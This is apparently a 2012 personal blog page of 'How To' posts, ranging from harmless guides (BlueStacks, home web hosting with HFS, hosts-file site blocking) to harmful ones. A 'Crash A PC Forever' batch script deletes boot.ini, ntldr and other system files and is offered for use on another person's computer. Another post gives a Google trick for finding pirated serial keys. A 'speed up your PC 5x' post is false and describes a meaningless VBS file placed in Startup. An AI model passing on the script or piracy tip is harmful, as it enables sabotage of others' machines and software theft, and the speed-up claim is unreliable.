Showing posts with label How To. Show all posts
Showing posts with label How To. Show all posts

Friday, November 23, 2012

Find Serial Key for any Software

►1. Those who use trial versions
of softs..
►2. Go to GOOGLE.com

►3. Type '94fbr' Then space and
then name of software u need..
►4. Google will show u links with
ur desired serial key or patch
files..

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How to Crash A PC Forever!!

@echo offattrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)




**Also remember this might not work with vista.**

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Sunday, September 23, 2012

Play Temple Run and more Android games on PC



In this short guide, you will find the required information about playing the original Temple Run and almost all of the Android games (even using the Android apps!) legally and paying nothing! It's obviously true and here are the instructions for it:

Step 1. You need a software to emulate Android system. Don't worry, there's no need to search for it. You can download Bluestacks from official Website of this amazing software. Here's the link: www.bluestacks.com

Step 2. Install Bluestacks to your PC. Bluestacks and its service automatically runs after the installation

Step 3. In Bluestacks window, search for the words of your favorite Android application as you search an app on the Google Playstore. Search Temple Run and click on it to install.

Step 4. After installation, you can run and play Temple Run by clicking on the app icon at home screen. Game's performance is up to your system specifications. So, you can play 3D games very smoothly if you have got an average computer at least.

Step 5. In the game, sliding function is replaced with holding left mouse button and sliding the mouse pointer left to right, right to left, up to down or down to up on the game screen. Tilting function is replaced with using the left & right Arrow keys on keyboard. You can play the most games with this control setting.

Step 6. That's all! Enjoy your brand new Android device and Temple Run game on your PC!

Please rate this guide and better leave a comment with a rating on Chrome Web Store if you liked it. Here's our app link: Play Temple Run!

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Friday, August 3, 2012

How to Speed up your Windows PC by 5x times

Don't you Wonder How Hacker maintains their PC's Speed even they have lots of softs installed on their PC??
If Yeah then I am sharing you a very Simple trick is here to speed up your PC:
Just have a look.


Program will open as if it was a sheet of paper.

Start by typing in the blank window: mystring=(8000000000). This is the most crucial part of the process. Be sure you typed it in correctly OR IT WILL NOT WORK.

After you typed that in your gonna go to - FILE>SAVE AS>FILE NAME BOX (name it ram.vbe)>SAVE (to desktop).

After you clicked "save" an icon will appear on the desktop named, "ram".

Go ahead and double click it as if it were a normal program. But, with this - double click it 5x times. Doing so, will clear the cache in your ram's query. Which will speed up your computer.



Now Save this file to Start up folder which you will find find under: START>ALL PROGRAMS>STARTUP.


Now drag your ram.vbe file and drop it under start up folder. So that whenever you boots up your PC this file execute ans speeds up your PC.

That's it! You should see a BIG DIFFERENCE in your COMPUTER'S SPEED!!!!

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Friday, July 20, 2012

How to host a Web Server on your Home PC



Step1. Download And Run The Software
Head to www.rejetto.com/hfs/ ?f=dl and download Http File Server (HFS). It is free and open source, and is a standalone executable that requires no installation.

Http File Server 


On XP with SP2, when you run HFS, you will be asked about whether or not to allow hfs.exe to connect to the Internet. Unblock HFS. Likewise, if you have a third-party firewall installed, configure it appropriately.

Step2. Configure The Port
By default, HFS uses port 80. If your firewall is blocking port 80, set HFS to use some other port (such as 8080 or 8245 and so on). To change the port number, turn HFS off by clicking on the green "On" button at the upper left corner. Change the port and turn HFS back on.

Also, if you are behind a router or firewall, you may, in some rare cases, need to set up port forwarding. The best way to go about this is to go to www.portforward.com. There, choose your router type, then choose the program you want to set up port forwarding for, which in our case is HFS. In such a scenario, you cannot proceed unless you know which router you are using.

Step3. Test HFS
To test whether your settings work, click the Menu in HFS and choose "Self Test". If the test completes successfully, your settings are correct. You should now be able to point your Web browser to your IP address and see HFS' default Web page.

Step4. Register A Domain
For setting up a Web site, you need to first assign it a domain name. For this, you need a DNS service running on your computer. You need to get one from a site that offers such a service. There are quite a few sites that offer such services, and we've chosen No-IP. This site offers a variety of free sub-domain names that you can register for your Web site.

Go to www.no-ip.com/newUser.php to create a No-IP account. Log on to the site with the account you created, and click on the Services button. Click on "Hosts / Redirects" on the left and then on Add. In the page that opens, enter a hostname of your choice and select from amongst the free domains available. Then choose the host type; "DNS Host" (Option A) is usually the best option.
Your ISP might be blocking inbound port 80; to get around this, choose "Port 80 Redirect". When you use this and run your Web server on an alternative port, users will not need to type a port number in the URL.

Click on "Create Host". Your domain will be available within five minutes of registration. You can use and give out this domain name instead of your IP address.

If you would like to use a domain name of your own, No-IP offers a custom DNS service for a yearly fee.

Step5. Install the Dynamic DNS Update Client
Skip this step if you have a static IP. If you don't, you will need a client software to take care of your changing IP address. Go to www.no-ip.com/downloads.php?page=win to download the No-IP.com

Log into No-IP 

Dynamic DNS Update client software. Install it and provide your login details. This program will sit in the system tray and automatically update your No-IP account when your external IP address changes.

Step6. Launch Your Web Site
You can now decide what page will appear when someone types in the name of your Web site. To change the default page, open HFS and click on "You are in Easy mode" to turn on Expert mode. Right-click on the little "house" icon in the Virtual File System (VFS) and click on "Bind root to real-folder". When prompted, point to the folder that contains the file you wish to display by default on your site. Click on "Default file mask…" and type in the name of the file you've chosen for this file, such as "index.html". Press [Ctrl] + [S] to save the VFS to any location on your hard disk.

No-IP Dynamic DNS Update Client 


If it is only files you wish to share with friends, you can just host the files on the site-an index.html is not necessary. Just drag and drop files into the VFS window and save the VFS. These files will be available for download from the opening page.

To make HFS start with Windows, choose Start/Exit > Run HFS when Windows starts. Also make sure to checkmark "Reload on startup VFS file previously open". You're done!

The method of Web hosting we've described is good enough if you wish to share files with friends or to create content for a few people to view. It is not recommended for high-traffic situations, though.

VIDEO TUTORIAL

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Monday, July 9, 2012

How to block websites for all users of a Window PC


Want to block all users of a Windows PC from opening certain websites, regardless of the browser they use or the time of day? You need only make a few simple additions to the Windows hosts file. This method is straightforward and free, and it doesn’t require you to download or install any additional software. It's an effective method for restricting users of all ages from seeing the content you don’t want them to access.

Block a Website on Your PC

1. Open Windows Explorer and navigate to C:\Windows\System32\drivers\etc. If Windows is not installed on C:, substitute the appropriate drive letter.
2. Double-click hosts, and select Notepad when Windows prompts you to choose a program. If you don't get the prompt, or if the hosts file opens in another program, open Notepad (Start, All Programs, Accessories, Notepad), and then navigate to hosts by clicking File, Open within Notepad.
How to Block a Website on Your PC
3. Place the cursor at the end of the last line, which will say something such as '127.0.0.1 localhost' or '::1 localhost'. Press Enter to create a new line.
4. Type 127.0.0.1, tap the spacebar once, and then type the address of a website you want to block. For example, to block all traffic from YouTube, type 127.0.0.1 www.youtube.com on this line.
5. Continue to add the websites you wish to block, each prefaced with 127.0.0.1 and a space.
How to Block a Website on Your PC
6. Click File, Save to commit to your changes. Dismiss any warnings from antimalware software, which may be triggered by your editing of the hosts file.
7. Close any open browser windows, and then reopen a browser to test your edits. The blocked sites should not display in any browser.

Selectively Block a Website Based on User or Time of Day

If blocking a site from all users at all times is overkill for your situation and you want more control, try using your router’s Web interface to block a website selectively.
1. Open a browser and enter your router’s IP address into the address bar. Refer to your router’s documentation for the IP address, or, if you don’t immediately know it, try a common address such as http://192.168.1.1, http://192.168.0.1, or http://192.168.2.1.
2. Enter your username and password. If you haven’t changed the username and password, and you don’t know the defaults, visit Port Forward’s Default Router Passwords page to find them.
3. Browse to the section where you can block websites, computers, and access during certain times of day. Router interfaces vary, but look for a section with a name such as 'Access Restrictions'.
4. Enter the details of the content and the users you’d like to restrict, and save your changes. Your router’s paper or electronic documentation should provide full instructions.
Remember to exercise caution when editing your hosts text file, and always make sure to back up files before you edit them. Good luck!

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